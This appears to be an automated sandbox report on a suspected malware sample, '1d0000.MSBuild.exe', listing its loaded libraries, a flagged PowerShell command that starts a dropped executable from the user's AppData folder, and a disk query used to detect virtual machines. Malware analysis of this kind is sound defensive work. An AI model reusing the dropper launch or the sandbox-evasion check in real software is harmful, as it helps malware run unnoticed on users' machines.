Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process 'C:\Users\user\AppData\Roaming\X9ZLAQA9VR.exe'"	Jump to behavior

Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior

Source: C:\Users\user\Desktop\1d0000.MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 1d0000.MSBuild.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 1d0000.MSBuild.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Suspicious powershell command line found

Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process 'C:\Users\user\AppData\Roaming\X9ZLAQA9VR.exe'"
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process 'C:\Users\user\AppData\Roaming\X9ZLAQA9VR.exe'"			Jump to behavior

Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Code function: 0_2_00007FFB4AE1000B push esp; retn 0001h	0_2_00007FFB4AE1002C
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Code function: 0_2_00007FFB4AE2A019 push eax; ret	0_2_00007FFB4AE2A020
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Code function: 0_2_00007FFB4AE2C0C0 pushad ; ret	0_2_00007FFB4AE2C0C7
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Code function: 0_2_00007FFB4AE2A0AF pushad ; ret	0_2_00007FFB4AE2A0B6

Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
